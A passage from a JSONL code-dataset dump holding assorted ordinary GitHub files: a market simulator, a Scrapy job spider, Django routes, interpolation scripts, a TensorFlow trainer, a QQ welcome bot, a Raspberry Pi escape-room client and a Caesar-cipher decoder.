= market._add_order(order=order)\n agent: Agent = self.simulator.id2agent[order.agent_id]\n agent.submitted_order(log=log)\n self.simulator._trigger_event_after_order(order_log=log)\n elif isinstance(order, Cancel):\n self.simulator._trigger_event_before_cancel(cancel=order)\n log_: CancelLog = market._cancel_order(cancel=order)\n agent = self.simulator.id2agent[order.order.agent_id]\n agent.canceled_order(log=log_)\n self.simulator._trigger_event_after_cancel(cancel_log=log_)\n if session.with_order_execution:\n logs: list[ExecutionLog] = market._execution()\n self.simulator._update_agents_for_execution(execution_logs=logs)\n for execution_log in logs:\n agent = self.simulator.id2agent[execution_log.buy_agent_id]\n agent.executed_order(log=execution_log)\n agent = self.simulator.id2agent[execution_log.sell_agent_id]\n agent.executed_order(log=execution_log)\n self.simulator._trigger_event_after_execution(\n execution_log=execution_log\n )\n\n @abstractmethod\n def modify_config(\n self,\n initial_config_dic: dict,\n variable_ranges_dic: dict\n ) -> dict:\n pass\n\n @abstractmethod\n def setup_runner(\n self,\n episode_config_dic: dict,\n logger: Optional[Logger] = None\n ) -> Runner:\n pass\n\n def add_attributes(self) -> None:\n pass\n\n @abstractmethod\n def generate_obs(self) -> ObsType:\n pass\n\n @abstractmethod\n def generate_reward(self) -> float:\n pass\n\n @abstractmethod\n def generate_info(self) -> float:\n pass\n\n @abstractmethod\n def convert_action2orders(self, action: ActionType) -> list[Order | Cancel]:\n pass\n","repo_name":"ryuji-hashimoto0110/pams_environments","sub_path":"envs/environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":16587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29375754349","text":"def alinearSecuencias(string1,string2):\n string2=list(string2)\n STRING=\"\"\n x=0\n for i in string1:\n if string2[x] == i:\n STRING+=string2[x]\n string2[x]=\"*\"\n x+=1\n else:\n STRING+=\"_\"\n for i in string2:\n if i != \"*\":\n STRING+=i\n return STRING\n\n#ENTRADA \ns1=\"ACCTGGTTCTGTAGTCAGGATTACTA\"\ns2=\"TGACGTTCAGTAGTCGATT\"\n#SALIDA\nalineado=alinearSecuencias(s1,s2)\nprint(alineado)","repo_name":"pabloschwarzenberg/grader","sub_path":"hito2_ej1/hito2_ej1_733d1e8c7375ce82970b28e90b39825d.py","file_name":"hito2_ej1_733d1e8c7375ce82970b28e90b39825d.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72113690168","text":"# -*- coding: utf-8 -*-\nimport scrapy\n\n\nclass JySpider(scrapy.Spider):\n name = 'jy'\n allowed_domains = ['guet.edu.cn']\n start_urls = ['https://www.guet.edu.cn/jy/zhaopin.jsp?a165823t=475&a165823p=1&a165823c=10&urltype=tree.TreeTempUrl&wbtreeid=1003']\n date = '' #此date为给定日期,已在__init__.py中初始化,直接在下面函数中用self.date调用即可\n\n def parse(self, response):\n # 爬取1到200页\n for i in range(1, 100):\n url = 'https://www.guet.edu.cn/jy/zhaopin.jsp?a165823t=475&a165823c=10&urltype=tree.TreeTempUrl&wbtreeid=1003&a165823p='+str(i)\n yield scrapy.Request(url, callback=self.parse_page)\n\n def parse_page(self, response):\n # 在此处添加代码\n ret_time = response.xpath(\"//div[@class='recruit-list-left']//a/text()\").extract()\n ret = response.xpath(\"//div[@class='recruit-list-left']//span/text()\").extract()\n for i in range(0, len(ret_time)):\n # 只打印选定日期的企业招聘信息\n if ret[i].strip() == self.date:\n print(ret_time[i])\n","repo_name":"jesee030/pythonProject","sub_path":"网络爬虫/src/guet/guet/spiders/jy.py","file_name":"jy.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32564550168","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.home, name='start'),\n path('home', views.invent),\n path('session', views.session),\n path('index.html', views.index),\n path('logout', views.logout),\n path('reservation', views.reservation, name='reservation'),\n path('utilisateur/', views.utilisateur),\n path('coworker.html/', views.coworker),\n path('dashboard.html/', views.dashboard),\n path('accueil.html/', views.accueil, name='home'),\n path('animateur.html/', views.animateur),\n path('sites.html/', views.salle),\n path('espace', views.espace, name='space'),\n path('type', views.type, name='type'),\n path('site', views.site, name='site'),\n path('service', views.service, name='service'),\n path('formule', views.formule, name='formule'),\n path('values', views.values),\n path('plan', views.plan),\n path('stats///', views.stats),\n path('link', views.link)\n]\nhandler404 = 'blueworks.views.handler404'\n","repo_name":"kimia-technologies/blueworksWeb","sub_path":"blueworks/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38085075834","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Author: v.stone@163.com\n\"\"\"\ncommon\n+-- elePages\n +-- __init__.py\n +-- menu_name.py\n\n__init__.py\nfrom . import menu_name\n\nmenu_name.py\ndef Page_Name():\n return {\n 'menu': '',\n 'page': '',\n }\n\"\"\"\n\nimport os\n\n\ndef generate_menu_cls():\n print('Extract elements dir to generate menu class ... ', end='\\t')\n ele_menu_list = list()\n ele_menu_dir = os.path.join(os.getenv('RF_PWD'), 'pages')\n for _dir in os.listdir(ele_menu_dir):\n if os.path.isdir(os.path.join(ele_menu_dir, _dir)):\n ele_menu_list.append(_dir)\n print('DONE')\n # print(ele_menu_list)\n ele_pages_dir = os.path.join(os.getenv('RF_PWD'), 'common', 'elePages')\n ele_pages_init = os.path.join(os.getenv('RF_PWD'), 'common', 'elePages', '__init__.py')\n # print(ele_pages_init)\n if not os.path.exists(ele_pages_dir):\n os.mkdir(ele_pages_dir)\n ele_cls = [\n '#!/usr/bin/env python3',\n '# -*- coding: utf-8- -*-',\n '# Author: elementGenerator.py',\n '\\n'\n ]\n for ele_menu in ele_menu_list:\n ele_cls.append('from . import %s' % ele_menu)\n with open(ele_pages_init, 'w') as f:\n f.write('\\n'.join(ele_cls))\n # with open(ele_pages_init, 'r') as f:\n # print(f.read())\n return ele_menu_list\n\n\ndef generate_page_py(ele_menu: str):\n print('Extract menu %s dir to generate page py ... ' % ele_menu, end='\\t')\n ele_page_py = os.path.join(\n os.getenv('RF_PWD'),\n 'common',\n 'elePages',\n '%s.py' % ele_menu\n )\n ele_def = [\n '#!/usr/bin/env python3',\n '# -*- coding: utf-8- -*-',\n '# Author: elementGenerator.py',\n '\\n'\n ]\n ele_page_dir = os.path.join(os.getenv('RF_PWD'), 'pages', ele_menu)\n for ele_page in os.listdir(ele_page_dir):\n if not ele_page.startswith('__'):\n ele_def.append('\\n'.join([\n 'def %s():' % ele_page.split('.py')[0],\n '\\treturn {',\n '\\t\\t\"menu\": \"%s\",' % ele_menu,\n '\\t\\t\"page\": \"%s\",' % ele_page.split('.py')[0],\n '\\t}',\n '\\n'\n ]))\n print('DONE')\n with open(ele_page_py, 'w') as f:\n f.write('\\n'.join(ele_def))\n # with open(ele_page_py, 'r') as f:\n # print(f.read())\n return True\n\n\nif __name__ == '__main__':\n for menu_name in generate_menu_cls():\n generate_page_py(menu_name)\n","repo_name":"seoktaehyeon/sraFramework","sub_path":"common/elementGenerator.py","file_name":"elementGenerator.py","file_ext":"py","file_size_in_byte":2464,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"72133154488","text":"#!/home/layersony/.local/share/virtualenvs/phase-python-series-2WgKwfZU/bin/python\nimport sqlite3\n\nclass Students:\n # initialize variables\n def __init__(self, student_name, student_reg):\n self.student_name = student_name\n self.student_reg = student_reg\n\n def save(self, db_cursor, connection):\n db_cursor.execute(f'''INSERT INTO students (student_name, student_reg) \n VALUES ('{self.student_name}', '{self.student_reg}')''')\n connection.commit() # persist the changes\n\n print('Successfully added student')\n\n @classmethod\n def get_all_students(cls, db_cursor):\n return db_cursor.execute('SELECT * FROM students')\n\nconnection = sqlite3.connect('library.db')\n\ndb_cursor = connection.cursor() # \n\n### Create new Student\n\nstudent1 = Students('Jane Doe', '20238765')\nstudent1.save(db_cursor, connection)\n\nstudent2 = Students('Jack Jill', '20231234')\nstudent2.save(db_cursor, connection)\n\n# print all students\nall_students = Students.get_all_students(db_cursor)\n\nfor student in all_students:\n print(student)\ndb_cursor.close()\n","repo_name":"layersony/Phase-3-Python-Series","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"2640411820","text":"import sys\n\ninput = sys.stdin.readline\n\nn,m = map(int,input().split())\n\ns = []\nfor _ in range(n):\n s.append(input())\n\nw = []\nfor _ in range(m):\n w.append(input())\n\ncount = 0\nfor i in w:\n if i in s:\n count += 1\n\nprint(count)","repo_name":"hyeongwoo-LEE/Algorithm-python","sub_path":"baekjoon_v1/14425_문자열집합.py","file_name":"14425_문자열집합.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24908210364","text":"import sqlite3\r\nimport sys\r\n\r\ndef io_dur(dur, mki, mko):\r\n if not dur: return 0\r\n if mko > 0: dur -= dur - mko\r\n if mki > 0: dur -= mki\r\n return dur\r\n\r\n\r\nclass DramaticaObject(object):\r\n default = {\r\n \"title\" : \"Unnamed object\"\r\n }\r\n\r\n def __init__(self, **kwargs):\r\n self.meta = {}\r\n self.meta.update(self.default)\r\n self.meta.update(kwargs)\r\n\r\n def __getitem__(self, key):\r\n return self.meta.get(key, False)\r\n\r\n def __setitem__(self, key, value):\r\n self.meta[key] = value\r\n\r\n def __delitem__(self, key):\r\n if key in self.meta:\r\n del (self.meta[key])\r\n\r\n\r\nclass DramaticaAsset(DramaticaObject):\r\n default = {\r\n \"is_optional\" : \"1\"\r\n }\r\n def __init__(self, **kwargs):\r\n super(DramaticaAsset, self).__init__(**kwargs)\r\n self.veto = False\r\n self.weights = {}\r\n\r\n @property \r\n def id(self):\r\n return self[\"id_object\"]\r\n\r\n @property\r\n def duration(self):\r\n dur = float(self.meta.get(\"duration\",0))\r\n mki = float(self.meta.get(\"mark_in\" ,0))\r\n mko = float(self.meta.get(\"mark_out\",0))\r\n if not dur: return 0\r\n if mko > 0: dur -= dur - mko\r\n if mki > 0: dur -= mki\r\n return dur\r\n\r\n def __repr__(self):\r\n t = \"Asset ID:{}\".format(self.id)\r\n if self[\"title\"]:\r\n try:\r\n t += \" ({})\".format(self[\"title\"])\r\n except:\r\n pass\r\n return t\r\n\r\nclass DramaticaCache(object):\r\n def __init__(self, tags):\r\n self.conn = sqlite3.connect(\":memory:\")\r\n self.cur = self.conn.cursor()\r\n self.assets = {}\r\n self.tags = tags + [\r\n (int, \"dramatica/weight\"),\r\n (float, \"io_duration\")\r\n ]\r\n tformat = \", \".join([\"`{}` {}\".format(tag, {int:\"INTEGER\", str:\"TEXT\", float:\"REAL\"}[t]) for t, tag in self.tags])\r\n self.cur.execute(\"CREATE TABLE assets (id_object INTEGER PRIMARY KEY, {})\".format(tformat))\r\n self.cur.execute(\"CREATE TABLE history (id_channel INTEGER, tstamp INTEGER, id_asset INTEGER)\")\r\n self.conn.commit()\r\n\r\n def load_assets(self, data_source):\r\n self.cur.execute(\"DELETE FROM assets;\")\r\n for i, asset in enumerate(data_source):\r\n id_object = asset[\"id_object\"]\r\n asset[\"io_duration\"] = io_dur(asset.get(\"duration\",0), asset.get(\"mark_in\", 0), asset.get(\"mark_out\", 0))\r\n self.cur.execute(\"INSERT INTO assets VALUES (?, {})\".format(\",\".join([\"?\"]*len(self.tags))), [id_object] + [asset.get(k, None) for t, k in self.tags ])\r\n self.assets[id_object] = DramaticaAsset(**asset)\r\n if i % 50 == 0:\r\n print(\"Loading assets\")\r\n self.conn.commit()\r\n \r\n def load_history(self, data_source, start=False, stop=False):\r\n if not (start or stop):\r\n self.cur.execute(\"DELETE FROM history;\")\r\n else:\r\n conds = []\r\n if start:\r\n conds.append(\"tstamp > {}\".format(start))\r\n if stop:\r\n conds.append(\"tstamp < {}\".format(stop))\r\n self.cur.execute(\"DELETE FROM history WHERE {}\".format(\" AND \".join(conds)))\r\n self.conn.commit()\r\n i = 0\r\n for id_channel, tstamp, id_asset in data_source:\r\n self.cur.execute(\"INSERT INTO history VALUES (?,?,?)\", [id_channel, tstamp, id_asset])\r\n i+=1\r\n if i % 20 == 0:\r\n yield \"Loading history\"\r\n self.conn.commit()\r\n \r\n def __getitem__(self, key):\r\n key = int(key)\r\n if key in self.assets:\r\n return self.assets[key]\r\n\r\n def sanit(self, instr):\r\n try:\r\n return str(instr).replace(\"''\",\"'\").replace(\"'\",\"''\").decode(\"utf-8\")\r\n except:\r\n return instr.replace(\"''\",\"'\").replace(\"'\",\"''\")\r\n\r\n def query(self, *args, **kwargs):\r\n try:\r\n self.cur.execute(*args)\r\n except:\r\n print(args)\r\n print(sys.exc_info())\r\n raise Exception\r\n if kwargs.get(\"one_column\", False):\r\n return [i[0] for i in self.cur.fetchall()]\r\n else:\r\n return self.cur.fetchall()\r\n","repo_name":"michaeltoohig/dramatica","sub_path":"dramatica/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":4255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19104298647","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n#Taking input from file:\n\ndef readfile(filename):\n\tcoordinates = []\n\twith open(filename) as f:\n\t\tlines = f.readlines()\n\t\tfor line in lines[1:]: \n\t\t\tvalues = line.split()\n\t\t\tcoordinate = (float(values[0]) ,\n\t\t\t\t float(values[1]) )\n\t\t\tcoordinates.append(coordinate)\n\treturn coordinates\n\t\n\t\ncoordinates = readfile(\"data.txt\")\nX = [-7.0, -9.0, 0.0, 9.0, 8.0, 3.0, -3.0 ]\nY = [2.0, 8.0, 1.0, 9.0, 5.0, -3.0, -7.0]\t\n\t\n\t\n#Lagrange Part:\n\t\ndef lagrange(coordinates, x):\n\tn = len(coordinates)\n\ty = 0.0\n\t\n\tfor i in range(n):\n\t\tfi = coordinates[i][1]\n\t\tprod = fi\n\t\tfor j in range(n):\n\t\t\tif j !=i:\n\t\t\t\txi = coordinates[i][0]\n\t\t\t\txj = coordinates[j][0]\n\t\t\t\tprod = prod * ((x-xj)/(xi-xj))\n\t\ty+=prod\n\treturn y\n\t\t\n\n\nxs = np.arange(-10,10,0.1)\nys = []\n\n\nfor x in xs:\n\tys.append(lagrange(coordinates, x))\n\t\n\t\nplt.plot(xs, ys)\nplt.plot(X,Y,'o')\nplt.show()\n\n\n#Newtons Part: \n\t\ndef b(X, Y, r, l):\n\tif l==r:\n\t\treturn Y[l]\n\treturn ( b(X, Y, r, l+1) - b(X, Y, r-1, l) )/(X[r]-X[l])\n\t\n\n\ndef Newton(x):\n\tsum_ = 0.\n\tfor i in range(len(X)):\n\t\t#print(i)\n\t\tmul = b(X, Y, i, 0)\n\t\tfor j in range(i):\n\t\t\tmul *= (x-X[j])\n\t\tsum_ += mul\n\treturn sum_\t\t\n\t\t\n\t\t\n\nx = np.arange(-10, 10, 0.1)\ny = Newton(x)\n\n\nplt.plot(x, y)\nplt.plot(X, Y, 'o')\nplt.show()\n\n\n\n\n\n\n","repo_name":"Sowmik23/Numerical-Lab-3-2","sub_path":"Lab-04(Lagrange_Interpolation)/LagrangeInterpolation.py","file_name":"LagrangeInterpolation.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"40063360947","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport pathlib\nimport random\n\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport numpy as np\nimport tensorflow as tf\n\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\n\nimport tensorflowjs as tfjs\n\n\n#tfjs_target_dir = 'tfjs_target_dir'\ntfjs_models_dir = 'tf_models'\n\n\ndata_root = pathlib.Path('../data_tf_dataset')\n\nall_image_paths = list(data_root.glob('*/*'))\nall_image_paths = [str(path) for path in all_image_paths]\n\nlabel_names = sorted(item.name for item in data_root.glob('*/') if item.is_dir())\n\nlabel_to_index = dict((name, index) for index, name in enumerate(label_names))\n\n\nall_image_labels = [label_to_index[pathlib.Path(path).parent.name] for path in all_image_paths]\n\n\npath_ds = tf.data.Dataset.from_tensor_slices(all_image_paths)\n\n\nlabel_ds = tf.data.Dataset.from_tensor_slices(tf.cast(all_image_labels, tf.int64))\n\nall_images_as_np = np.array([tf.image.resize(mpimg.imread(image_path), [256, 256]) for image_path in all_image_paths])\n\n\nall_image_labels_as_np = np.array(all_image_labels)\n\n\nall_index = list(range(all_image_labels_as_np.shape[0]))\n\nrandom.shuffle(all_index)\n\nall_index_random_train = all_index[0:(3 * len(all_index) // 4)]\nall_index_random_test = all_index[(3 * len(all_index) // 4):]\n\n\nprint(len(all_index_random_train), len(all_index_random_test))\n\nall_images_as_np_shuffled = all_images_as_np[all_index]\n\n\nall_labels_as_np_shuffled = all_image_labels_as_np[all_index]\n\n\nx_train = all_images_as_np_shuffled[0:(3 * len(all_index) // 4)]\nx_test = all_images_as_np_shuffled[(3 * len(all_index) // 4):]\n\n\ny_train = all_labels_as_np_shuffled[0:(3 * len(all_index) // 4)]\ny_test = all_labels_as_np_shuffled[(3 * len(all_index) // 4):]\n\nnum_classes = 2\ninput_shape = (256, 256, 3)\n\n\nx_train = x_train / 255\nx_test = x_test / 255\n\nx_train_exp = np.expand_dims(x_train, -1)\nx_test_exp = np.expand_dims(x_test, -1)\n\ny_train = keras.utils.to_categorical(y_train, num_classes)\ny_test = keras.utils.to_categorical(y_test, num_classes)\n\nprint(y_train.shape, y_test.shape)\n\nmodel = keras.Sequential(\n [\n keras.Input(shape=input_shape),\n layers.Conv2D(32, kernel_size=(3, 3), activation=\"relu\"),\n layers.MaxPooling2D(pool_size=(2, 2)),\n layers.Conv2D(64, kernel_size=(3, 3), activation=\"relu\"),\n layers.MaxPooling2D(pool_size=(2, 2)),\n layers.Flatten(),\n layers.Dropout(0.5),\n layers.Dense(num_classes, activation=\"softmax\"),\n ]\n)\n\nmodel.summary()\n\nbatch_size = 16\nepochs = 6\n\nmodel.compile(loss=\"categorical_crossentropy\", optimizer=\"adam\", metrics=[\"accuracy\"])\nmodel.fit(x_train, y_train, batch_size=batch_size, epochs=epochs, validation_split=0.25)\n\ntfjs.converters.save_keras_model(model, tfjs_models_dir)","repo_name":"contemplat0r/tf_pwa_test","sub_path":"code/tf_dataset_exp.py","file_name":"tf_dataset_exp.py","file_ext":"py","file_size_in_byte":2765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"28144834552","text":"from nonebot import on_notice\nfrom nonebot.typing import T_State\nfrom nonebot.adapters.cqhttp import Bot, Message, GroupDecreaseNoticeEvent, GroupIncreaseNoticeEvent\n \nwelcome = on_notice()\n#朋友加群\n@welcome.handle()\nasync def _(bot: Bot, event:GroupIncreaseNoticeEvent, state: T_State):\n user = event.get_user_id()\n at_ = \"[CQ:at,qq={}]\".format(user)\n msg = at_ + '欢迎您的加入!我是机器人晚星,您可以直接在群聊/私聊我来查询自己的授权时长信息,只需对我说 查询+手机号 (示例:查询 12345678901) 即可哦'\n msg = Message(msg)\n await welcome.finish(message=msg)\n \n#群友退群\n@welcome.handle()\nasync def _(bot: Bot, event:GroupDecreaseNoticeEvent, state: T_State):\n user = event.get_user_id()\n at_ = \"[CQ:at,qq={}]\".format(user)\n msg = at_ + '\\n' + '一位朋友离我们而去!'\n msg = Message(msg)\n await welcome.finish(message=msg)","repo_name":"Nell3582/ScriptWorkflows","sub_path":"qqbot/weclome.py","file_name":"weclome.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"40043000256","text":"#!/bin/python3\r\n\r\n#exemple de script client pyro4\r\n\r\nimport sys\r\nimport random\r\nimport time\r\nimport threading\r\nimport Pyro4.core\r\nimport RPi.GPIO as GPIO\r\nimport os\r\n\r\ntime.sleep(5)\r\n\r\n\r\nclass Client():\r\n#classe Cable \r\n\r\n def __init__(self):\r\n\t\r\n self.connect() #connecto to name server and distant server script\r\n self.flag=[False,False,False] \r\n self.temps=[0,0,0]\r\n self.etat=[0,0,0,0]\r\n\r\n def connect(self):\r\n connected=False\r\n while connected==False:\r\n try:\r\n self.ipserveur=\"192.168.233.1\" #pyro server ip\r\n \r\n\r\n self.nameserver=Pyro4.locateNS(host=self.ipserveur,port=9090) #pyro4 nameserver localisation\r\n self.uri = self.nameserver.lookup(\"xxxx\") #lookpu the distant object xxxx on name server\r\n self.server = Pyro4.Proxy(self.uri) #etablish connection to distant object\r\n connected=True #success\r\n\t\t\t\t\r\n except:# sleep 5 secondebefore trying reconnect\r\n print(\"waiting for server\")\r\n\r\n time.sleep(5)\r\n\r\n def refresh(self): #refresh flags, state and temps from server each 500ms\r\n try:\r\n self.flag=self.server.getflag() #1: run #2 win #3 lost #4 reset #5 flash\r\n self.etat=self.server.getetat() #list of 5 int\r\n self.temps=self.server.gettemps() #1 time, #2 additionnal time\r\n \r\n except: #Automatic reconnexion if connexion lost \r\n print(\"Connection lost. REBINDING...\")\r\n print(\"(restart the server now)\")\r\n self.server._pyroReconnect()\r\n time.sleep(5)\r\n threading.Timer(0.5, script.refresh).start()\r\n \r\nscript=Client() #\r\nscript.refresh()\r\n\r\njack1=17\r\njack2=18\r\njack3=27\r\njack4=22\r\n\r\nrelay=21\r\n\r\nGPIO.setup(jack1, GPIO.IN, pull_up_down=GPIO.PUD_UP)\r\nGPIO.setup(jack2, GPIO.IN, pull_up_down=GPIO.PUD_UP)\r\nGPIO.setup(jack3, GPIO.IN, pull_up_down=GPIO.PUD_UP)\r\nGPIO.setup(jack4, GPIO.IN, pull_up_down=GPIO.PUD_UP)\r\nGPIO.setup(relay, GPIO.OUT, initial=GPIO.LOW)\r\n\r\n\r\n\r\nwhile True:\r\n \r\n#infinite loop for game \r\n try:\r\n\r\n\r\n\r\n if script.flag[0] == True:\r\n if GPIO.input(jack1) == False and GPIO.input(jack2) == False and GPIO.input(jack3) == False and GPIO.input(jack4) == False:\r\n GPIO.output(relay,GPIO.HIGH)\r\n script.server.changeetat(0,1)\r\n else:\r\n \r\n GPIO.output(relay,GPIO.LOW)\r\n elif script.flag[1]==False and script.flag[2]==False:\r\n script.server.changeetat(0,0)\r\n GPIO.output(relay,GPIO.LOW)\r\n \r\n time.sleep(0.3)\r\n except KeyboardInterrupt:\r\n GPIO.cleanup() \r\n\r\n\r\n","repo_name":"toz00/pyroEscape","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"44574598545","text":"import importlib\nfrom string import ascii_lowercase as lc\nimport sys\n\nfile = open(sys.argv[1], 'r').read().lower()\n\ndef brute_force():\n for key in range(1,26):\n resultado = ''\n print(f'Key: {key}')\n for letra in file:\n if letra in lc:\n index = lc.find(letra)\n index = (index - key) % 26\n resultado += lc[index]\n else:\n resultado += letra\n \n print(resultado)\n\nif __name__ == '__main__':\n brute_force()\n","repo_name":"lucasferreira94/CifraCesarPY","sub_path":"brute_force.py","file_name":"brute_force.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"31536319185","text":"orders = int(input())\ntotal_price = 0\n\nfor _ in range(orders):\n\n price_capsule = float(input())\n days = int(input())\n daily_capsules = int(input())\n\n if (\n (price_capsule < 0.01 or price_capsule > 100.00) or\n (days < 1 or days > 31) or\n (daily_capsules < 1 or daily_capsules > 2000)\n ):\n continue\n\n price = daily_capsules * days * price_capsule\n print(f\"The price for the coffee is: ${price:.2f}\")\n total_price += price\n\nprint(f\"Total: ${total_price:.2f}\")\n\n","repo_name":"VladiDemirev/fundamentals","sub_path":"BasicSyntaxConditionalStatementsAndLoopsExercise/05Orders.py","file_name":"05Orders.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5171532344","text":"import os\nos.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\"\nos.environ['CUDA_VISIBLE_DEVICES'] = \"0\"\nfrom tensorflow.python.client import device_lib\nprint(device_lib.list_local_devices())\n\nimport sys\nimport time\nimport numpy as np\n\n# COCO\nfrom pycocotools.coco import COCO\nfrom pycocotools.cocoeval import COCOeval\nfrom pycocotools import mask as maskUtils\n\nfrom mrcnn.evaluate import build_coco_results, evaluate_coco\nfrom mrcnn.dataset import ds\n\nimport zipfile\nimport urllib.request\nimport shutil\n\nROOT_DIR = os.getcwd()\n\n# Import Mask RCNN\nsys.path.append(ROOT_DIR) # To find local version of the library\nfrom mrcnn.config import Config\nfrom mrcnn import model as modellib, utils\n\n\nPRETRAINED_MODEL_PATH = os.path.join(ROOT_DIR,\"data/\" \"pretrained_weights.h5\")\nLOGS_DIRECTORY = os.path.join(ROOT_DIR, \"logs\")\n\nclass configobj(Config):\n \"\"\"Configuration for training on data in MS COCO format.\n Derives from the base Config class and overrides values specific\n to the COCO dataset.\n \"\"\"\n # Give the configuration a recognizable name\n NAME = \"FRS\"\n\n # We use a GPU with 12GB memory, which can fit two images.\n # Adjust down if you use a smaller GPU.\n IMAGES_PER_GPU = 1\n\n # Uncomment to train on 8 GPUs (default is 1)\n GPU_COUNT = 1\n\n # Number of classes (including background)\n NUM_CLASSES = 1 + 1 # 1 Backgroun + 1 Building\n\n STEPS_PER_EPOCH=1000\n VALIDATION_STEPS=50\n\n\n IMAGE_MAX_DIM=320\n IMAGE_MIN_DIM=320\n\nconfig = configobj()\nconfig.display()\n\nmodel = modellib.MaskRCNN(mode=\"training\", config=config, model_dir=LOGS_DIRECTORY)\n# Load pretrained weights\nmodel_path = model.find_last()[1]\nprint(model_path)\nmodel.load_weights(model_path, by_name=True)\n\n# Load training dataset\ndataset_train = ds()\ndataset_train.load_dataset(dataset_dir=os.path.join(\"data\", \"train\"), load_small=True)\ndataset_train.prepare()\n\n# Load validation dataset\ndataset_val = ds()\nval_coco = dataset_val.load_dataset(dataset_dir=os.path.join(\"data\", \"val\"), load_small=True, return_coco=True)\ndataset_val.prepare()\n\n# Training - Stage 1\nprint(\"Training network heads\")\nmodel.train(dataset_train, dataset_val,\n learning_rate=config.LEARNING_RATE,\n epochs=30,\n layers='heads')\n\n# Training - Stage 2\n# Finetune layers from ResNet stage 4 and up\nprint(\"Fine tune Resnet stage 4 and up\")\nmodel.train(dataset_train, dataset_val,\n learning_rate=config.LEARNING_RATE,\n epochs=50,\n layers='4+')\n\n# Training - Stage 3\n# Fine tune all layers\nprint(\"Fine tune all layers\")\nmodel.train(dataset_train, dataset_val,\n learning_rate=config.LEARNING_RATE / 5,\n epochs=70,\n layers='all')\n","repo_name":"oiynick/rcnn_buildings","sub_path":"Training.py","file_name":"Training.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"7181476136","text":"#!/usr/bin/env python3\nimport sys,os\n#sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)),'CRTT_lib'))\nimport urllib.request\nimport urllib.parse\nfrom urllib.error import URLError, HTTPError\nfrom urllib.parse import urlparse\nfrom datetime import datetime\nfrom datetime import timedelta\nimport socket \nimport json\nfrom distutils.version import LooseVersion\n\nfrom CRTT.loglib import logger\n#from CRTT_Error import HttpTimeError\nfrom CRTT.retry import retry\nfrom CRTT.config import CONF\nimport os.path\nimport configparser\nimport re,ast\nfrom CRTT.crtt_json import *\n\nsocket.setdefaulttimeout(CONF.REQUEST.timeout)\nVERSION = '1.0.0'\n\nclass GEN_URL():\n\t'''\n\tBuild complete URL\n\n\t:param host: IP address or domain name of the target \n\t\tRest Server's resource interface.\n\t:type host: str\n\t:param path: the path of the URL to access a specific Redfish Node.\n\t\texample:'/redfish/v1'\n\t:type path: str, optional\n\t:param url: the url of a specific Redfish Node.\n\t\texample:'http://10.204.29.221:8888/redfish/v1/Managers/1'\n\t:type url: str, optional\n\n\t:output get_url: return completed URL to access a specific node.\n\t:type get_url: str\n\t:output get_path: return path of an URL.\n\t:type get_url: str\n\t'''\n\tsupported_rest_versions = CONF.REST.ver_support\n\n\tdef __init__(self,host,scheme='http',rest_version=None,port=8888):\n\t\tself._empty_com=urlparse('')\n\t\tself._scheme=scheme\n\t\tport=str(port)\n\t\tself._netloc=host+\":\"+port\n\t\tself.cli_name = CONF.REST.client_name\n\t\tself._rest_version = rest_version\n\t\tself.new_url=''\n\n\tdef _check_rest_version(self, version):\n\t\t\"\"\"Validate a REST API version is supported by the library and target array.\"\"\"\n\t\tversion = str(version)\n\t\tif version not in self.supported_rest_versions:\n\t\t\tmsg = \"Library is incompatible with REST API version {0}\"\n\t\t\traise ValueError(msg.format(version))\n\t\treturn version\n\n\tdef _choose_rest_version(self):\n\t\t\"\"\"Return the latest REST API version supported by target array.\"\"\"\n\t\treturn max(self.supported_rest_versions, key=LooseVersion)\n\n\tdef _gen_rest_ver(self):\n\t\tif self._rest_version:\n\t\t\t# check input version whether is in support list\n\t\t\tself._rest_version = self._check_rest_version(self._rest_version)\n\t\telse:\n\t\t\tself._rest_version = self._choose_rest_version()\n\n\tdef get_url(self, path=None):\n\t\tif path == None or path == 'None' or path == 